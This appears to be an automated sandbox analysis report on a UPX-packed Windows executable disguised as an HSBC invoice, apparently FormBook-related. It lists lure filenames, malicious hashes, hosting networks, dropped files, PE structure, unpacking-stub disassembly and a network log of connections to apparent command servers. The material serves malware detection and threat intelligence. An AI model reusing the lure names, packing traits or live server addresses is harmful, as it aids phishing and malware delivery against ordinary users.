www.hawalaz.xyz | Adjunto confirmacion de pedido.exe | malicious | DBatLoader, FormBook | 162.0.213.72
www.hawalaz.xyz | Potvrda narudzbe u prilogu.exe | malicious | DBatLoader, FormBook | 162.0.213.72
www.hawalaz.xyz | U prilogu lista novih narudzbi.exe | malicious | DBatLoader, FormBook | 162.0.213.72
www.hawalaz.xyz | z28098882729202928.exe | malicious | DBatLoader, FormBook | 162.0.213.72
www.hawalaz.xyz | 900524362267263.exe | malicious | FormBook | 162.0.213.72
www.hawalaz.xyz | dokaz o uplati.exe | malicious | DBatLoader, FormBook | 162.0.213.72
yetung.com.lho0.faipod.com | Shipping Documents.exe | malicious | FormBook | 121.37.199.72
yetung.com.lho0.faipod.com | Shipping Documents.exe | malicious | FormBook | 121.37.199.72
yetung.com.lho0.faipod.com | IMG______6122024.exe | malicious | FormBook | 121.37.199.72
yetung.com.lho0.faipod.com | PO14624.exe | malicious | FormBook | 121.37.199.72
yetung.com.lho0.faipod.com | IMG___001.exe | malicious | FormBook | 121.37.199.72
yetung.com.lho0.faipod.com | IMG__001.exe | malicious | FormBook | 121.37.199.72
yetung.com.lho0.faipod.com | lrShdpqqbi.rtf | malicious | FormBook | 121.37.199.72
yetung.com.lho0.faipod.com | pFvpxWS2lD.exe | malicious | FormBook | 121.37.199.72
yetung.com.lho0.faipod.com | rShippingDocuments.exe | malicious | FormBook | 121.37.199.72
kloeti.pc205kopl.com | Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook | 162.209.189.210
kloeti.pc205kopl.com | KALIANDRA SETYATAMA_24000000120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook | 162.209.189.212
kloeti.pc205kopl.com | Halk #U0130#U015eLEM _24000000120887000033208 'd#U0131r.-1034 nolu TICARI .exe | malicious | FormBook | 162.209.189.210
kloeti.pc205kopl.com | 2_PT Adika Tirta Daya_PTID GTC of Purchase order(V2-092 .exe | malicious | FormBook | 162.209.189.211
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
FTG-AS-APForewinTelecomGroupLimitedISPatHK | wQsdlAeKOF.elf | malicious | Mirai | 115.126.52.144
FTG-AS-APForewinTelecomGroupLimitedISPatHK | AAwUREvt6b.elf | malicious | Mirai | 118.99.50.248
FTG-AS-APForewinTelecomGroupLimitedISPatHK | 8kCtyMSFxf.exe | malicious | Dinodas RAT | 115.126.98.204
FTG-AS-APForewinTelecomGroupLimitedISPatHK | 8kCtyMSFxf.exe | malicious | Dinodas RAT | 115.126.98.204
FTG-AS-APForewinTelecomGroupLimitedISPatHK | VIMEKSIM PO# 1330 Confirmation_pdf.exe | malicious | FormBook, GuLoader | 115.126.37.251
FTG-AS-APForewinTelecomGroupLimitedISPatHK | VESSEL PARTICULARS & INSTRUCTIONS_docx.exe | malicious | FormBook, GuLoader | 115.126.37.251
FTG-AS-APForewinTelecomGroupLimitedISPatHK | Purchase_Order_PA056223.pdf.exe | malicious | FormBook, GuLoader | 115.126.37.251
FTG-AS-APForewinTelecomGroupLimitedISPatHK | skyljnee.arm7-20240128-0910.elf | malicious | Mirai | 115.126.52.124
FTG-AS-APForewinTelecomGroupLimitedISPatHK | 3Xq2C4NXet.exe | malicious | FormBook | 118.99.48.216
FTG-AS-APForewinTelecomGroupLimitedISPatHK | President_Mohamed_Irfaan_Ali's_Official_Visit_to_Nassau,_The_Bahamas.exe | malicious | Unknown | 115.126.98.204
CNSERVERSUS | Adjunto confirmacion de pedido.exe | malicious | DBatLoader, FormBook | 198.16.50.172
CNSERVERSUS | Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook | 162.209.189.210
CNSERVERSUS | SJ5SyRpCFA.elf | malicious | Unknown | 154.88.57.118
CNSERVERSUS | PO Number 00127011.exe | malicious | FormBook | 198.16.50.172
CNSERVERSUS | arm4-20240623-0650.elf | malicious | Mirai | 156.251.245.85
CNSERVERSUS | ORDEN DE COMPRA URGENTEsxlx..exe | malicious | FormBook | 156.251.142.108
CNSERVERSUS | HSBC Bank_Approvel Letter.exe | malicious | FormBook | 154.198.243.132
CNSERVERSUS | acLghFWq0Z.elf | malicious | Mirai | 172.247.146.162
CNSERVERSUS | SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf | malicious | FormBook | 45.205.12.21
CNSERVERSUS | BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exe | malicious | FormBook | 156.251.142.105
ACPCA | Adjunto confirmacion de pedido.exe | malicious | DBatLoader, FormBook | 162.0.213.72
ACPCA | nJ8mJTmMf0.exe | malicious | FormBook | 162.0.213.72
ACPCA | yUFX4wGvLW.elf | malicious | Mirai, Moobot | 162.54.102.167
ACPCA | DHL Arrival Notice.exe | malicious | FormBook | 162.0.213.72
ACPCA | Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook | 162.0.213.72
ACPCA | Potvrda narudzbe u prilogu.exe | malicious | DBatLoader, FormBook | 162.0.213.72
ACPCA | Shipping Documents.exe | malicious | FormBook | 162.0.213.72
ACPCA | Shipping Documents.exe | malicious | FormBook | 162.0.213.72
ACPCA | doc_Rfq_TNTM Spareparts TM00002916620 exp_pdf.com.exe | malicious | DarkCloud | 162.55.60.2
ACPCA | RFQ-ref_05921538.exe | malicious | DarkTortilla, FormBook | 162.0.209.224
ACENS_ASSpainHostinghousingandVPNservicesES | Request for Quotation - (SM Store San Mateo).exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | D02984-KP-002011.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | REQN#1010135038.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | pismo1A 12.06.2024.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | RFQ for Maintenance usering for Sabratha Project.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | CFV20240600121.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | file.exe | malicious | SystemBC | 217.116.0.152
ACENS_ASSpainHostinghousingandVPNservicesES | 8427xbk3Zt.elf | malicious | Unknown | 81.46.192.224
ACENS_ASSpainHostinghousingandVPNservicesES | vm6XYZzWOd.exe | malicious | PureLog Stealer, SystemBC | 82.194.66.60
ACENS_ASSpainHostinghousingandVPNservicesES | bzVCvtoyIt.elf | malicious | Mirai | 81.46.244.157
                  Process:C:\Windows\SysWOW64\rundll32.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                  Category:dropped
                  Size (bytes):196608
                  Entropy (8bit):1.1209935793793442
                  Encrypted:false
                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                  MD5:214CFA91B0A6939C4606C4F99C9183B3
                  SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                  SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                  SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):272896
                  Entropy (8bit):7.995975841426055
                  Encrypted:true
                  SSDEEP:6144:BKJkjgzfkLcTQiRnhXO2jdRtGgZiee18ZXwcNY9Ma8ykDj+nKW:f2JTQEhz3QgZijGlCz8thW
                  MD5:C88EF6AE25EA906A594E0F0EFB9FBAA2
                  SHA1:DB7B26CB48D5267B6821308124CA5F7E2A245613
                  SHA-256:FE1F7BEED9B270ACBD19EBD3E289654FD237F1240B97AD9A823ECD80A0164BA6
                  SHA-512:C3BE303037B08B3FC8434B8C4B15C6B1701EE5610F4ED479D7818B07D52192B8B2994159E7FD5FB50C7B8378248D305494660A07C6EF7509FE795332C9F0B20D
                  Malicious:false
                  Reputation:low
                  Preview:.....1JTD...\......YD....UQ...NJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1.TDQ@-.F5.1.m.F..{f>00w6<%V85)q-S;&Z&.R)y5-]z[8y...n'^.1j\C8qH5R80LY>Y:..6>.j&)..*3.K.rU5.*..dS=.L..z.-..='9sR2.5R80LYGXc.2V.BVFA..TDQN2UH5.82MRFS3Z*RYCWFNJ1JT.EN2UX5R8.HYGXsZ2FYCWDNJ7JTDQN2UN5R80LYGX.^2V[CWFNJ1HT..N2EH5B80LYWX3J2VYCWF^J1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYm##6>1JT FJ2UX5R8(HYGH3Z2VYCWFNJ1JTDqN25H5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYC
                  Process:C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9890
                  Entropy (8bit):7.604261411389946
                  Encrypted:false
                  SSDEEP:192:65jwEiqilnLM9ny1R9hi4Vd/zJkecGgDTv3qKXX1ho/ngGXNdbspHDuLBN3mT/aX:I6qilnw9nydhi8eecGkL3H1ho/nJdWsD
                  MD5:4ACEB3AF2985F59217FB7EF286528BBC
                  SHA1:9658BB756D9DFDBF51BD15DE992B54719E5369ED
                  SHA-256:0AE845556273C6ABD7C7C3A86DAB0E560F0EAF265B9B7EAFEA207B88FB37C02F
                  SHA-512:C030E6116B00B54A3276D296D604F96FE1D2CF470B1DD9E16B783F0568CE191110B62C8587C171F7029037E55CF00CB8F312A48C0960B06BE9351069FDBFA05B
                  Malicious:false
                  Reputation:low
                  Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@
                  Process:C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):272896
                  Entropy (8bit):7.995975841426055
                  Encrypted:true
                  SSDEEP:6144:BKJkjgzfkLcTQiRnhXO2jdRtGgZiee18ZXwcNY9Ma8ykDj+nKW:f2JTQEhz3QgZijGlCz8thW
                  MD5:C88EF6AE25EA906A594E0F0EFB9FBAA2
                  SHA1:DB7B26CB48D5267B6821308124CA5F7E2A245613
                  SHA-256:FE1F7BEED9B270ACBD19EBD3E289654FD237F1240B97AD9A823ECD80A0164BA6
                  SHA-512:C3BE303037B08B3FC8434B8C4B15C6B1701EE5610F4ED479D7818B07D52192B8B2994159E7FD5FB50C7B8378248D305494660A07C6EF7509FE795332C9F0B20D
                  Malicious:false
                  Reputation:low
                  Preview:.....1JTD...\......YD....UQ...NJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1.TDQ@-.F5.1.m.F..{f>00w6<%V85)q-S;&Z&.R)y5-]z[8y...n'^.1j\C8qH5R80LY>Y:..6>.j&)..*3.K.rU5.*..dS=.L..z.-..='9sR2.5R80LYGXc.2V.BVFA..TDQN2UH5.82MRFS3Z*RYCWFNJ1JT.EN2UX5R8.HYGXsZ2FYCWDNJ7JTDQN2UN5R80LYGX.^2V[CWFNJ1HT..N2EH5B80LYWX3J2VYCWF^J1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYm##6>1JT FJ2UX5R8(HYGH3Z2VYCWFNJ1JTDqN25H5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYCWFNJ1JTDQN2UH5R80LYGX3Z2VYC
                  Process:C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
                  File Type:ASCII text, with very long lines (28756), with no line terminators
                  Category:dropped
                  Size (bytes):28756
                  Entropy (8bit):3.6001852112347517
                  Encrypted:false
                  SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbJ+I66H54vfF3if6gyyw:miTZ+2QoioGRk6ZklputwjpjBkCiw2Rk
                  MD5:AF525DCDECDDAB659F9F580008AAF210
                  SHA1:738AD250A54DF646375C523EB6DAFC073E71CCE4
                  SHA-256:92186CD08BE51BD01191AA73E324850C982A5D8337C54DE98947160D5790E79B
                  SHA-512:E29E9044AA0DEDC5447070F802573B396028598EEFAE2CC485F1E66D4C75C777F9B1E8E7F66105EAA4B3AAB42C5ECCACEDA87592582E9B918665A7CFB09B586F
                  Malicious:false
                  Reputation:low
                  Preview:
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                  Entropy (8bit):7.923765157713181
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.39%
                  • UPX compressed Win32 Executable (30571/9) 0.30%
                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  File name:HSBCscancopy-invoice778483-payment87476MT103.exe
                  File size:719'872 bytes
                  MD5:15125bd7f04e0129ceebb7781f7051d2
                  SHA1:d06ac0fc49a473fafac1069ebe195edd6996cec1
                  SHA256:e5f5e88e8becfe092d10a927f72f580fd3a98612989a69a1f6df309f32b169f6
                  SHA512:4f7ae5be7fe522742170a38f4f805b38013d908ad71ba5d4e48976036f389d89f80af5e88e652195bc4ed46142ff036ff3f4ab012d06c4185c218d76c1bd1d1d
                  SSDEEP:12288:mYV6MorX7qzuC3QHO9FQVHPF51jgcmB+3sSfAW5p5c+EV6XpIzmb:lBXu9HGaVHm8SWHe+E8Emb
                  TLSH:0BE412526E03ED7EC4BF42F9543EB550B503ED28C95B1A5E32DBB94687B82A4E033790
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                  Icon Hash:25243e2cb65666b4
                  Entrypoint:0x5320a0
                  Entrypoint Section:UPX1
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6684CEC0 [Wed Jul 3 04:08:32 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:fc6683d30d9f25244a50fd5357825e79
                  Instruction
                  pushad
                  mov esi, 004DC000h
                  lea edi, dword ptr [esi-000DB000h]
                  push edi
                  jmp 00007F48E8F763CDh
                  nop
                  mov al, byte ptr [esi]
                  inc esi
                  mov byte ptr [edi], al
                  inc edi
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F48E8F763AFh
                  mov eax, 00000001h
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc eax, eax
                  add ebx, ebx
                  jnc 00007F48E8F763CDh
                  jne 00007F48E8F763EAh
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F48E8F763E1h
                  dec eax
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc eax, eax
                  jmp 00007F48E8F76396h
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc ecx, ecx
                  jmp 00007F48E8F76414h
                  xor ecx, ecx
                  sub eax, 03h
                  jc 00007F48E8F763D3h
                  shl eax, 08h
                  mov al, byte ptr [esi]
                  inc esi
                  xor eax, FFFFFFFFh
                  je 00007F48E8F76437h
                  sar eax, 1
                  mov ebp, eax
                  jmp 00007F48E8F763CDh
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F48E8F7638Eh
                  inc ecx
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F48E8F76380h
                  add ebx, ebx
                  jne 00007F48E8F763C9h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc ecx, ecx
                  add ebx, ebx
                  jnc 00007F48E8F763B1h
                  jne 00007F48E8F763CBh
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jnc 00007F48E8F763A6h
                  add ecx, 02h
                  cmp ebp, FFFFFB00h
                  adc ecx, 02h
                  lea edx, dword ptr [edi+ebp]
                  cmp ebp, FFFFFFFCh
                  jbe 00007F48E8F763D0h
                  mov al, byte ptr [edx]
                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18bec0 | 0x424 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x133000 | 0x58ec0 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18c2e4 | 0xc | .rsrc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x132284 | 0x48 | UPX1
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  UPX0 | 0x1000 | 0xdb000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  UPX1 | 0xdc000 | 0x57000 | 0x56400 | e8ba3979b7993255a63d3ac995698db4 | False | 0.9873896059782609 | data | 7.935381232832145 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x133000 | 0x5a000 | 0x59400 | 1dacf871281cf3c3636eab06e3d21f05 | False | 0.9034242603291317 | data | 7.858307054458179 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_ICON | 0x13345c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                  RT_ICON | 0x133588 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                  RT_ICON | 0x1336b4 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                  RT_ICON | 0x1337e0 | 0xa2a8 | Device independent bitmap graphic, 100 x 200 x 32, image size 40000, resolution 5905 x 5905 px/m | English | Great Britain | 0.19913544668587896
                  RT_MENU | 0xd2a78 | 0x50 | empty | English | Great Britain | 0
                  RT_STRING | 0xd2ac8 | 0x594 | empty | English | Great Britain | 0
                  RT_STRING | 0xd305c | 0x68a | empty | English | Great Britain | 0
                  RT_STRING | 0xd36e8 | 0x490 | empty | English | Great Britain | 0
                  RT_STRING | 0xd3b78 | 0x5fc | empty | English | Great Britain | 0
                  RT_STRING | 0xd4174 | 0x65c | empty | English | Great Britain | 0
                  RT_STRING | 0xd47d0 | 0x466 | empty | English | Great Britain | 0
                  RT_STRING | 0xd4c38 | 0x158 | empty | English | Great Britain | 0
                  RT_RCDATA | 0x13da8c | 0x4df00 | data | | | 1.0003320469125903
                  RT_GROUP_ICON | 0x18b990 | 0x14 | data | English | Great Britain | 1.25
                  RT_GROUP_ICON | 0x18b9a8 | 0x14 | data | English | Great Britain | 1.25
                  RT_GROUP_ICON | 0x18b9c0 | 0x14 | data | English | Great Britain | 1.15
                  RT_GROUP_ICON | 0x18b9d8 | 0x14 | data | English | Great Britain | 1.25
                  RT_VERSION | 0x18b9f0 | 0xdc | data | English | Great Britain | 0.6181818181818182
                  RT_MANIFEST | 0x18bad0 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                  DLL | Import
                  KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                  ADVAPI32.dll | GetAce
                  COMCTL32.dll | ImageList_Remove
                  COMDLG32.dll | GetOpenFileNameW
                  GDI32.dll | LineTo
                  IPHLPAPI.DLL | IcmpSendEcho
                  MPR.dll | WNetUseConnectionW
                  ole32.dll | CoGetObject
                  OLEAUT32.dll | VariantInit
                  PSAPI.DLL | GetProcessMemoryInfo
                  SHELL32.dll | DragFinish
                  USER32.dll | GetDC
                  USERENV.dll | LoadUserProfileW
                  UxTheme.dll | IsThemeActive
                  VERSION.dll | VerQueryValueW
                  WININET.dll | FtpOpenFileW
                  WINMM.dll | timeGetTime
                  WSOCK32.dll | connect
                  Language of compilation system | Country where language is spoken | Map
                  English | Great Britain |
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 3, 2024 10:50:51.093254089 CEST | 49718 | 80 | 192.168.2.11 | 118.99.50.8
                  Jul 3, 2024 10:50:51.098886013 CEST | 80 | 49718 | 118.99.50.8 | 192.168.2.11
                  Jul 3, 2024 10:50:51.098963976 CEST | 49718 | 80 | 192.168.2.11 | 118.99.50.8
                  Jul 3, 2024 10:50:51.101381063 CEST | 49718 | 80 | 192.168.2.11 | 118.99.50.8
                  Jul 3, 2024 10:50:51.106642962 CEST | 80 | 49718 | 118.99.50.8 | 192.168.2.11
                  Jul 3, 2024 10:50:51.965064049 CEST | 80 | 49718 | 118.99.50.8 | 192.168.2.11
                  Jul 3, 2024 10:50:51.965188980 CEST | 80 | 49718 | 118.99.50.8 | 192.168.2.11
                  Jul 3, 2024 10:50:51.965399981 CEST | 49718 | 80 | 192.168.2.11 | 118.99.50.8
                  Jul 3, 2024 10:50:51.968379021 CEST | 49718 | 80 | 192.168.2.11 | 118.99.50.8
                  Jul 3, 2024 10:50:51.976737022 CEST | 80 | 49718 | 118.99.50.8 | 192.168.2.11
                  Jul 3, 2024 10:51:15.236264944 CEST | 49720 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:15.241398096 CEST | 80 | 49720 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:15.241584063 CEST | 49720 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:15.243486881 CEST | 49720 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:15.249795914 CEST | 80 | 49720 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:16.745532990 CEST | 49720 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:16.751329899 CEST | 80 | 49720 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:16.751518011 CEST | 49720 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:17.764516115 CEST | 49721 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:17.774231911 CEST | 80 | 49721 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:17.774300098 CEST | 49721 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:17.776242971 CEST | 49721 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:17.787133932 CEST | 80 | 49721 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:19.292402029 CEST | 49721 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:19.298444986 CEST | 80 | 49721 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:19.298496008 CEST | 49721 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:20.310882092 CEST | 49722 | 80 | 192.168.2.11 | 162.0.213.72
                  Jul 3, 2024 10:51:20.317795992 CEST | 80 | 49722 | 162.0.213.72 | 192.168.2.11
                  Jul 3, 2024 10:51:20.317874908 CEST | 49722 | 80 | 192.168.2.11 | 162.0.213.72
